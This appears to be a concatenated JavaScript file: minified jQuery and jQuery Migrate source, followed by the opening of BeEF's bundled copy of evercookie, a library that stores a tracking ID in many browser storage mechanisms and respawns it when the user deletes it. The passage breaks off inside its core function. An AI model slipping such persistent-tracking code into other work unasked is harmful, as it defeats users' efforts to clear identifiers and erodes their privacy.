c,y,v,w,T,N=n;2!==b&&(b=2,s&&clearTimeout(s),u=t,a=i||"",C.readyState=e>0?4:0,c=e>=200&&300>e||304===e,r&&(w=Mn(p,C,r)),w=On(p,w,C,c),c?(p.ifModified&&(T=C.getResponseHeader("Last-Modified"),T&&(x.lastModified[o]=T),T=C.getResponseHeader("etag"),T&&(x.etag[o]=T)),204===e||"HEAD"===p.type?N="nocontent":304===e?N="notmodified":(N=w.state,y=w.data,v=w.error,c=!v)):(v=N,(e||!N)&&(N="error",0>e&&(e=0))),C.status=e,C.statusText=(n||N)+"",c?h.resolveWith(f,[y,N,C]):h.rejectWith(f,[C,N,v]),C.statusCode(m),m=t,l&&d.trigger(c?"ajaxSuccess":"ajaxError",[C,p,c?y:v]),g.fireWith(f,[C,N]),l&&(d.trigger("ajaxComplete",[C,p]),--x.active||x.event.trigger("ajaxStop")))}return C},getJSON:function(e,t,n){return x.get(e,t,n,"json")},getScript:function(e,n){return x.get(e,t,n,"script")}}),x.each(["get","post"],function(e,n){x[n]=function(e,r,i,o){return x.isFunction(r)&&(o=o||i,i=r,r=t),x.ajax({url:e,type:n,dataType:o,data:r,success:i})}});function Mn(e,n,r){var i,o,a,s,l=e.contents,u=e.dataTypes;while("*"===u[0])u.shift(),o===t&&(o=e.mimeType||n.getResponseHeader("Content-Type"));if(o)for(s in l)if(l[s]&&l[s].test(o)){u.unshift(s);break}if(u[0]in r)a=u[0];else{for(s in r){if(!u[0]||e.converters[s+" "+u[0]]){a=s;break}i||(i=s)}a=a||i}return a?(a!==u[0]&&u.unshift(a),r[a]):t}function On(e,t,n,r){var i,o,a,s,l,u={},c=e.dataTypes.slice();if(c[1])for(a in e.converters)u[a.toLowerCase()]=e.converters[a];o=c.shift();while(o)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!l&&r&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),l=o,o=c.shift())if("*"===o)o=l;else if("*"!==l&&l!==o){if(a=u[l+" "+o]||u["* "+o],!a)for(i in u)if(s=i.split(" "),s[1]===o&&(a=u[l+" "+s[0]]||u["* "+s[0]])){a===!0?a=u[i]:u[i]!==!0&&(o=s[0],c.unshift(s[1]));break}if(a!==!0)if(a&&e["throws"])t=a(t);else try{t=a(t)}catch(p){return{state:"parsererror",error:a?p:"No conversion from "+l+" to "+o}}}return{state:"success",data:t}}x.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return x.globalEval(e),e}}}),x.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),x.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=a.head||x("head")[0]||a.documentElement;return{send:function(t,i){n=a.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){(t||!n.readyState||/loaded|complete/.test(n.readyState))&&(n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||i(200,"success"))},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var Fn=[],Bn=/(=)\?(?=&|$)|\?\?/;x.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Fn.pop()||x.expando+"_"+vn++;return this[e]=!0,e}}),x.ajaxPrefilter("json jsonp",function(n,r,i){var o,a,s,l=n.jsonp!==!1&&(Bn.test(n.url)?"url":"string"==typeof n.data&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Bn.test(n.data)&&"data");return l||"jsonp"===n.dataTypes[0]?(o=n.jsonpCallback=x.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,l?n[l]=n[l].replace(Bn,"$1"+o):n.jsonp!==!1&&(n.url+=(bn.test(n.url)?"&":"?")+n.jsonp+"="+o),n.converters["script json"]=function(){return s||x.error(o+" was not called"),s[0]},n.dataTypes[0]="json",a=e[o],e[o]=function(){s=arguments},i.always(function(){e[o]=a,n[o]&&(n.jsonpCallback=r.jsonpCallback,Fn.push(o)),s&&x.isFunction(a)&&a(s[0]),s=a=t}),"script"):t});var Pn,Rn,Wn=0,$n=e.ActiveXObject&&function(){var e;for(e in Pn)Pn[e](t,!0)};function In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}x.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=x.ajaxSettings.xhr(),x.support.cors=!!Rn&&"withCredentials"in Rn,Rn=x.support.ajax=!!Rn,Rn&&x.ajaxTransport(function(n){if(!n.crossDomain||x.support.cors){var r;return{send:function(i,o){var a,s,l=n.xhr();if(n.username?l.open(n.type,n.url,n.async,n.username,n.password):l.open(n.type,n.url,n.async),n.xhrFields)for(s in n.xhrFields)l[s]=n.xhrFields[s];n.mimeType&&l.overrideMimeType&&l.overrideMimeType(n.mimeType),n.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)l.setRequestHeader(s,i[s])}catch(u){}l.send(n.hasContent&&n.data||null),r=function(e,i){var s,u,c,p;try{if(r&&(i||4===l.readyState))if(r=t,a&&(l.onreadystatechange=x.noop,$n&&delete Pn[a]),i)4!==l.readyState&&l.abort();else{p={},s=l.status,u=l.getAllResponseHeaders(),"string"==typeof l.responseText&&(p.text=l.responseText);try{c=l.statusText}catch(f){c=""}s||!n.isLocal||n.crossDomain?1223===s&&(s=204):s=p.text?200:404}}catch(d){i||o(-1,d)}p&&o(s,c,p,u)},n.async?4===l.readyState?setTimeout(r):(a=++Wn,$n&&(Pn||(Pn={},x(e).unload($n)),Pn[a]=r),l.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var Xn,Un,Vn=/^(?:toggle|show|hide)$/,Yn=RegExp("^(?:([+-])=|)("+w+")([a-z%]*)$","i"),Jn=/queueHooks$/,Gn=[nr],Qn={"*":[function(e,t){var n=this.createTween(e,t),r=n.cur(),i=Yn.exec(t),o=i&&i[3]||(x.cssNumber[e]?"":"px"),a=(x.cssNumber[e]||"px"!==o&&+r)&&Yn.exec(x.css(n.elem,e)),s=1,l=20;if(a&&a[3]!==o){o=o||a[3],i=i||[],a=+r||1;do s=s||".5",a/=s,x.style(n.elem,e,a+o);while(s!==(s=n.cur()/r)&&1!==s&&--l)}return i&&(a=n.start=+a||+r||0,n.unit=o,n.end=i[1]?a+(i[1]+1)*i[2]:+i[2]),n}]};function Kn(){return setTimeout(function(){Xn=t}),Xn=x.now()}function Zn(e,t,n){var r,i=(Qn[t]||[]).concat(Qn["*"]),o=0,a=i.length;for(;a>o;o++)if(r=i[o].call(n,t,e))return r}function er(e,t,n){var r,i,o=0,a=Gn.length,s=x.Deferred().always(function(){delete l.elem}),l=function(){if(i)return!1;var t=Xn||Kn(),n=Math.max(0,u.startTime+u.duration-t),r=n/u.duration||0,o=1-r,a=0,l=u.tweens.length;for(;l>a;a++)u.tweens[a].run(o);return s.notifyWith(e,[u,o,n]),1>o&&l?n:(s.resolveWith(e,[u]),!1)},u=s.promise({elem:e,props:x.extend({},t),opts:x.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:Xn||Kn(),duration:n.duration,tweens:[],createTween:function(t,n){var r=x.Tween(e,u.opts,t,n,u.opts.specialEasing[t]||u.opts.easing);return u.tweens.push(r),r},stop:function(t){var n=0,r=t?u.tweens.length:0;if(i)return this;for(i=!0;r>n;n++)u.tweens[n].run(1);return t?s.resolveWith(e,[u,t]):s.rejectWith(e,[u,t]),this}}),c=u.props;for(tr(c,u.opts.specialEasing);a>o;o++)if(r=Gn[o].call(u,e,c,u.opts))return r;return x.map(c,Zn,u),x.isFunction(u.opts.start)&&u.opts.start.call(e,u),x.fx.timer(x.extend(l,{elem:e,anim:u,queue:u.opts.queue})),u.progress(u.opts.progress).done(u.opts.done,u.opts.complete).fail(u.opts.fail).always(u.opts.always)}function tr(e,t){var n,r,i,o,a;for(n in e)if(r=x.camelCase(n),i=t[r],o=e[n],x.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),a=x.cssHooks[r],a&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}x.Animation=x.extend(er,{tweener:function(e,t){x.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;i>r;r++)n=e[r],Qn[n]=Qn[n]||[],Qn[n].unshift(t)},prefilter:function(e,t){t?Gn.unshift(e):Gn.push(e)}});function nr(e,t,n){var r,i,o,a,s,l,u=this,c={},p=e.style,f=e.nodeType&&nn(e),d=x._data(e,"fxshow");n.queue||(s=x._queueHooks(e,"fx"),null==s.unqueued&&(s.unqueued=0,l=s.empty.fire,s.empty.fire=function(){s.unqueued||l()}),s.unqueued++,u.always(function(){u.always(function(){s.unqueued--,x.queue(e,"fx").length||s.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],"inline"===x.css(e,"display")&&"none"===x.css(e,"float")&&(x.support.inlineBlockNeedsLayout&&"inline"!==ln(e.nodeName)?p.zoom=1:p.display="inline-block")),n.overflow&&(p.overflow="hidden",x.support.shrinkWrapBlocks||u.always(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t)if(i=t[r],Vn.exec(i)){if(delete t[r],o=o||"toggle"===i,i===(f?"hide":"show"))continue;c[r]=d&&d[r]||x.style(e,r)}if(!x.isEmptyObject(c)){d?"hidden"in d&&(f=d.hidden):d=x._data(e,"fxshow",{}),o&&(d.hidden=!f),f?x(e).show():u.done(function(){x(e).hide()}),u.done(function(){var t;x._removeData(e,"fxshow");for(t in c)x.style(e,t,c[t])});for(r in c)a=Zn(f?d[r]:0,r,u),r in d||(d[r]=a.start,f&&(a.end=a.start,a.start="width"===r||"height"===r?1:0))}}function rr(e,t,n,r,i){return new rr.prototype.init(e,t,n,r,i)}x.Tween=rr,rr.prototype={constructor:rr,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(x.cssNumber[n]?"":"px")},cur:function(){var e=rr.propHooks[this.prop];return e&&e.get?e.get(this):rr.propHooks._default.get(this)},run:function(e){var t,n=rr.propHooks[this.prop];return this.pos=t=this.options.duration?x.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):rr.propHooks._default.set(this),this}},rr.prototype.init.prototype=rr.prototype,rr.propHooks={_default:{get:function(e){var t;return null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=x.css(e.elem,e.prop,""),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){x.fx.step[e.prop]?x.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[x.cssProps[e.prop]]||x.cssHooks[e.prop])?x.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},rr.propHooks.scrollTop=rr.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},x.each(["toggle","show","hide"],function(e,t){var n=x.fn[t];x.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ir(t,!0),e,r,i)}}),x.fn.extend({fadeTo:function(e,t,n,r){return this.filter(nn).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=x.isEmptyObject(e),o=x.speed(t,n,r),a=function(){var t=er(this,x.extend({},e),o);(i||x._data(this,"finish"))&&t.stop(!0)};return a.finish=a,i||o.queue===!1?this.each(a):this.queue(o.queue,a)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return"string"!=typeof e&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=null!=e&&e+"queueHooks",o=x.timers,a=x._data(this);if(n)a[n]&&a[n].stop&&i(a[n]);else for(n in a)a[n]&&a[n].stop&&Jn.test(n)&&i(a[n]);for(n=o.length;n--;)o[n].elem!==this||null!=e&&o[n].queue!==e||(o[n].anim.stop(r),t=!1,o.splice(n,1));(t||!r)&&x.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=x._data(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=x.timers,a=r?r.length:0;for(n.finish=!0,x.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;a>t;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}});function ir(e,t){var n,r={height:e},i=0;for(t=t?1:0;4>i;i+=2-t)n=Zt[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}x.each({slideDown:ir("show"),slideUp:ir("hide"),slideToggle:ir("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){x.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),x.speed=function(e,t,n){var r=e&&"object"==typeof e?x.extend({},e):{complete:n||!n&&t||x.isFunction(e)&&e,duration:e,easing:n&&t||t&&!x.isFunction(t)&&t};return r.duration=x.fx.off?0:"number"==typeof r.duration?r.duration:r.duration in x.fx.speeds?x.fx.speeds[r.duration]:x.fx.speeds._default,(null==r.queue||r.queue===!0)&&(r.queue="fx"),r.old=r.complete,r.complete=function(){x.isFunction(r.old)&&r.old.call(this),r.queue&&x.dequeue(this,r.queue)},r},x.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},x.timers=[],x.fx=rr.prototype.init,x.fx.tick=function(){var e,n=x.timers,r=0;for(Xn=x.now();n.length>r;r++)e=n[r],e()||n[r]!==e||n.splice(r--,1);n.length||x.fx.stop(),Xn=t},x.fx.timer=function(e){e()&&x.timers.push(e)&&x.fx.start()},x.fx.interval=13,x.fx.start=function(){Un||(Un=setInterval(x.fx.tick,x.fx.interval))},x.fx.stop=function(){clearInterval(Un),Un=null},x.fx.speeds={slow:600,fast:200,_default:400},x.fx.step={},x.expr&&x.expr.filters&&(x.expr.filters.animated=function(e){return x.grep(x.timers,function(t){return e===t.elem}).length}),x.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){x.offset.setOffset(this,e,t)});var n,r,o={top:0,left:0},a=this[0],s=a&&a.ownerDocument;if(s)return n=s.documentElement,x.contains(n,a)?(typeof a.getBoundingClientRect!==i&&(o=a.getBoundingClientRect()),r=or(s),{top:o.top+(r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:o.left+(r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):o},x.offset={setOffset:function(e,t,n){var r=x.css(e,"position");"static"===r&&(e.style.position="relative");var i=x(e),o=i.offset(),a=x.css(e,"top"),s=x.css(e,"left"),l=("absolute"===r||"fixed"===r)&&x.inArray("auto",[a,s])>-1,u={},c={},p,f;l?(c=i.position(),p=c.top,f=c.left):(p=parseFloat(a)||0,f=parseFloat(s)||0),x.isFunction(t)&&(t=t.call(e,n,o)),null!=t.top&&(u.top=t.top-o.top+p),null!=t.left&&(u.left=t.left-o.left+f),"using"in t?t.using.call(e,u):i.css(u)}},x.fn.extend({position:function(){if(this[0]){var e,t,n={top:0,left:0},r=this[0];return"fixed"===x.css(r,"position")?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),x.nodeName(e[0],"html")||(n=e.offset()),n.top+=x.css(e[0],"borderTopWidth",!0),n.left+=x.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-x.css(r,"marginTop",!0),left:t.left-n.left-x.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||s;while(e&&!x.nodeName(e,"html")&&"static"===x.css(e,"position"))e=e.offsetParent;return e||s})}}),x.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);x.fn[e]=function(i){return x.access(this,function(e,i,o){var a=or(e);return o===t?a?n in a?a[n]:a.document.documentElement[i]:e[i]:(a?a.scrollTo(r?x(a).scrollLeft():o,r?o:x(a).scrollTop()):e[i]=o,t)},e,i,arguments.length,null)}});function or(e){return x.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}x.each({Height:"height",Width:"width"},function(e,n){x.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){x.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return x.access(this,function(n,r,i){var o;return x.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?x.css(n,r,s):x.style(n,r,i,s)},n,a?i:t,a,null)}})}),x.fn.size=function(){return this.length},x.fn.andSelf=x.fn.addBack,"object"==typeof module&&module&&"object"==typeof module.exports?module.exports=x:(e.jQuery=e.$=x,"function"==typeof define&&define.amd&&define("jquery",[],function(){return x}))})(window);
7
8
9/*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */
10jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHooks.value&&e.attrHooks.value.set||function(){return n},l=/^(?:input|button)$/i,d=/^[238]$/,p=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,f=/^(?:checked|selected)$/i;a(e,"attrFn",o||{},"jQuery.attrFn is deprecated"),e.attr=function(t,a,i,u){var c=a.toLowerCase(),g=t&&t.nodeType;return u&&(4>s.length&&r("jQuery.fn.attr( props, pass ) is deprecated"),t&&!d.test(g)&&(o?a in o:e.isFunction(e.fn[a])))?e(t)[a](i):("type"===a&&i!==n&&l.test(t.nodeName)&&t.parentNode&&r("Can't change the 'type' of an input or button in IE 6/7/8"),!e.attrHooks[c]&&p.test(c)&&(e.attrHooks[c]={get:function(t,r){var a,i=e.prop(t,r);return i===!0||"boolean"!=typeof i&&(a=t.getAttributeNode(r))&&a.nodeValue!==!1?r.toLowerCase():n},set:function(t,n,r){var a;return n===!1?e.removeAttr(t,r):(a=e.propFix[r]||r,a in t&&(t[a]=!0),t.setAttribute(r,r.toLowerCase())),r}},f.test(c)&&r("jQuery.fn.attr('"+c+"') may use property instead of attribute")),s.call(e,t,a,i))},e.attrHooks.value={get:function(e,t){var n=(e.nodeName||"").toLowerCase();return"button"===n?u.apply(this,arguments):("input"!==n&&"option"!==n&&r("jQuery.fn.attr('value') no longer gets properties"),t in e?e.value:null)},set:function(e,t){var a=(e.nodeName||"").toLowerCase();return"button"===a?c.apply(this,arguments):("input"!==a&&"option"!==a&&r("jQuery.fn.attr('value', val) no longer sets properties"),e.value=t,n)}};var g,h,v=e.fn.init,m=e.parseJSON,y=/^([^<]*)(<[\w\W]+>)([^>]*)$/;e.fn.init=function(t,n,a){var i;return t&&"string"==typeof t&&!e.isPlainObject(n)&&(i=y.exec(e.trim(t)))&&i[0]&&("<"!==t.charAt(0)&&r("$(html) HTML strings must start with '<' character"),i[3]&&r("$(html) HTML text after last tag is ignored"),"#"===i[0].charAt(0)&&(r("HTML string cannot start with a '#' character"),e.error("JQMIGRATE: Invalid selector string (XSS)")),n&&n.context&&(n=n.context),e.parseHTML)?v.call(this,e.parseHTML(i[2],n,!0),n,a):v.apply(this,arguments)},e.fn.init.prototype=e.fn,e.parseJSON=function(e){return e||null===e?m.apply(this,arguments):(r("jQuery.parseJSON requires a valid JSON string"),null)},e.uaMatch=function(e){e=e.toLowerCase();var t=/(chrome)[ \/]([\w.]+)/.exec(e)||/(webkit)[ \/]([\w.]+)/.exec(e)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(e)||/(msie) ([\w.]+)/.exec(e)||0>e.indexOf("compatible")&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(e)||[];return{browser:t[1]||"",version:t[2]||"0"}},e.browser||(g=e.uaMatch(navigator.userAgent),h={},g.browser&&(h[g.browser]=!0,h.version=g.version),h.chrome?h.webkit=!0:h.webkit&&(h.safari=!0),e.browser=h),a(e,"browser",e.browser,"jQuery.browser is deprecated"),e.sub=function(){function t(e,n){return new t.fn.init(e,n)}e.extend(!0,t,this),t.superclass=this,t.fn=t.prototype=this(),t.fn.constructor=t,t.sub=this.sub,t.fn.init=function(r,a){return a&&a instanceof e&&!(a instanceof t)&&(a=t(a)),e.fn.init.call(this,r,a,n)},t.fn.init.prototype=t.fn;var n=t(document);return r("jQuery.sub() is deprecated"),t},e.ajaxSetup({converters:{"text json":e.parseJSON}});var b=e.fn.data;e.fn.data=function(t){var a,i,o=this[0];return!o||"events"!==t||1!==arguments.length||(a=e.data(o,t),i=e._data(o,t),a!==n&&a!==i||i===n)?b.apply(this,arguments):(r("Use of jQuery.fn.data('events') is deprecated"),i)};var j=/\/(java|ecma)script/i,w=e.fn.andSelf||e.fn.addBack;e.fn.andSelf=function(){return r("jQuery.fn.andSelf() replaced by jQuery.fn.addBack()"),w.apply(this,arguments)},e.clean||(e.clean=function(t,a,i,o){a=a||document,a=!a.nodeType&&a[0]||a,a=a.ownerDocument||a,r("jQuery.clean() is deprecated");var s,u,c,l,d=[];if(e.merge(d,e.buildFragment(t,a).childNodes),i)for(c=function(e){return!e.type||j.test(e.type)?o?o.push(e.parentNode?e.parentNode.removeChild(e):e):i.appendChild(e):n},s=0;null!=(u=d[s]);s++)e.nodeName(u,"script")&&c(u)||(i.appendChild(u),u.getElementsByTagName!==n&&(l=e.grep(e.merge([],u.getElementsByTagName("script")),c),d.splice.apply(d,[s+1,0].concat(l)),s+=l.length));return d});var Q=e.event.add,x=e.event.remove,k=e.event.trigger,N=e.fn.toggle,T=e.fn.live,M=e.fn.die,S="ajaxStart|ajaxStop|ajaxSend|ajaxComplete|ajaxError|ajaxSuccess",C=RegExp("\\b(?:"+S+")\\b"),H=/(?:^|\s)hover(\.\S+|)\b/,A=function(t){return"string"!=typeof t||e.event.special.hover?t:(H.test(t)&&r("'hover' pseudo-event is deprecated, use 'mouseenter mouseleave'"),t&&t.replace(H,"mouseenter$1 mouseleave$1"))};e.event.props&&"attrChange"!==e.event.props[0]&&e.event.props.unshift("attrChange","attrName","relatedNode","srcElement"),e.event.dispatch&&a(e.event,"handle",e.event.dispatch,"jQuery.event.handle is undocumented and deprecated"),e.event.add=function(e,t,n,a,i){e!==document&&C.test(t)&&r("AJAX events should be attached to document: "+t),Q.call(this,e,A(t||""),n,a,i)},e.event.remove=function(e,t,n,r,a){x.call(this,e,A(t)||"",n,r,a)},e.fn.error=function(){var e=Array.prototype.slice.call(arguments,0);return r("jQuery.fn.error() is deprecated"),e.splice(0,0,"error"),arguments.length?this.bind.apply(this,e):(this.triggerHandler.apply(this,e),this)},e.fn.toggle=function(t,n){if(!e.isFunction(t)||!e.isFunction(n))return N.apply(this,arguments);r("jQuery.fn.toggle(handler, handler...) is deprecated");var a=arguments,i=t.guid||e.guid++,o=0,s=function(n){var r=(e._data(this,"lastToggle"+t.guid)||0)%o;return e._data(this,"lastToggle"+t.guid,r+1),n.preventDefault(),a[r].apply(this,arguments)||!1};for(s.guid=i;a.length>o;)a[o++].guid=i;return this.click(s)},e.fn.live=function(t,n,a){return r("jQuery.fn.live() is deprecated"),T?T.apply(this,arguments):(e(this.context).on(t,this.selector,n,a),this)},e.fn.die=function(t,n){return r("jQuery.fn.die() is deprecated"),M?M.apply(this,arguments):(e(this.context).off(t,this.selector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);
11
12
13//
14// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
15// Browser Exploitation Framework (BeEF) - http://beefproject.com
16// See the file 'doc/COPYING' for copying permission
17//
18
19/*
20 * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
21 *
22 * by samy kamkar : code@samy.pl : http://samy.pl
23 *
24 * this api attempts to produce several types of persistent data
25 * to essentially make a cookie virtually irrevocable from a system
26 *
27 * specifically it uses:
28 * - standard http cookies
29 * - flash cookies (local shared objects)
30 * - silverlight isolated storage
31 * - png generation w/forced cache and html5 canvas pixel reading
32 * - http etags
33 * - http cache
34 * - window.name
35 * - IE userData
36 * - html5 session cookies
37 * - html5 local storage
38 * - html5 global storage
39 * - html5 database storage via sqlite
40 * - css history scanning
41 *
42 * if any cookie is found, it's then reset to all the other locations
43 * for example, if someone deletes all but one type of cookie, once
44 * that cookie is re-discovered, all of the other cookie types get reset
45 *
46 * !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
47 * OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
48 *
49 * USAGE:
50
51 var ec = new evercookie();
52
53 // set a cookie "id" to "12345"
54 // usage: ec.set(key, value)
55 ec.set("id", "12345");
56
57 // retrieve a cookie called "id" (simply)
58 ec.get("id", function(value) { alert("Cookie value is " + value) });
59
60 // or use a more advanced callback function for getting our cookie
61 // the cookie value is the first param
62 // an object containing the different storage methods
63 // and returned cookie values is the second parameter
64 function getCookie(best_candidate, all_candidates)
65 {
66 alert("The retrieved cookie is: " + best_candidate + "\n" +
67 "You can see what each storage mechanism returned " +
68 "by looping through the all_candidates object.");
69
70 for (var item in all_candidates)
71 document.write("Storage mechanism " + item +
72 " returned " + all_candidates[item] + " votes<br>");
73 }
74 ec.get("id", getCookie);
75
76 // we look for "candidates" based off the number of "cookies" that
77 // come back matching since it's possible for mismatching cookies.
78 // the best candidate is very-very-likely the correct one
79
80*/
81
82/* to turn off CSS history knocking, set _ec_history to 0 */
83var _ec_history = 1; // CSS history knocking or not .. can be network intensive
84var _ec_tests = 10;//1000;
85var _ec_debug = 0;
86
87function _ec_dump(arr, level)
88{
89 var dumped_text = "";
90 if(!level) level = 0;
91
92 //The padding given at the beginning of the line.
93 var level_padding = "";
94 for(var j=0;j<level+1;j++) level_padding += " ";
95
96 if(typeof(arr) == 'object') { //Array/Hashes/Objects
97 for(var item in arr) {
98 var value = arr[item];
99
100 if(typeof(value) == 'object') { //If it is an array,
101 dumped_text += level_padding + "'" + item + "' ...\n";
102 dumped_text += _ec_dump(value,level+1);
103 } else {
104 dumped_text += level_padding + "'" + item + "' => \"" + value + "\"\n";
105 }
106 }
107 } else { //Stings/Chars/Numbers etc.
108 dumped_text = "===>"+arr+"<===("+typeof(arr)+")";
109 }
110 return dumped_text;
111}
112
113function _ec_replace(str, key, value)
114{
115 if (str.indexOf('&' + key + '=') > -1 || str.indexOf(key + '=') == 0)
116 {
117 // find start
118 var idx = str.indexOf('&' + key + '=');
119 if (idx == -1)
120 idx = str.indexOf(key + '=');
121
122 // find end
123 var end = str.indexOf('&', idx + 1);
124 var newstr;
125 if (end != -1)
126 newstr = str.substr(0, idx) + str.substr(end + (idx ? 0 : 1)) + '&' + key + '=' + value;
127 else
128 newstr = str.substr(0, idx) + '&' + key + '=' + value;
129
130 return newstr;
131 }
132 else
133 return str + '&' + key + '=' + value;
134}
135
136
137// necessary for flash to communicate with js...
138// please implement a better way
139var _global_lso;
140function _evercookie_flash_var(cookie)
141{
142 _global_lso = cookie;
143
144 // remove the flash object now
145 var swf = $('#myswf');
146 if (swf && swf.parentNode)
147 swf.parentNode.removeChild(swf);
148}
149
150var evercookie = (function () {
151this._class = function() {
152
153var self = this;
154// private property
155_baseKeyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
156this._ec = {};
157var no_color = -1;
158
159this.get = function(name, cb, dont_reset)
160{
161 $(document).ready(function() {
162 self._evercookie(name, cb, undefined, undefined, dont_reset);
163 });
164};
165
166this.set = function(name, value)
167{
168 $(document).ready(function() {
169 self._evercookie(name, function() { }, value);
170 });
171};
172
173this._evercookie = function(name, cb, value, i, dont_reset)
174{
175 if (typeof self._evercookie == 'undefined')
176 self = this;
177
178 if (typeof i == 'undefined')
179 i = 0;
180
181 // first run
182 if (i == 0)
183 {
184 self.evercookie_database_storage(name, value);
185 self.evercookie_png(name, value);
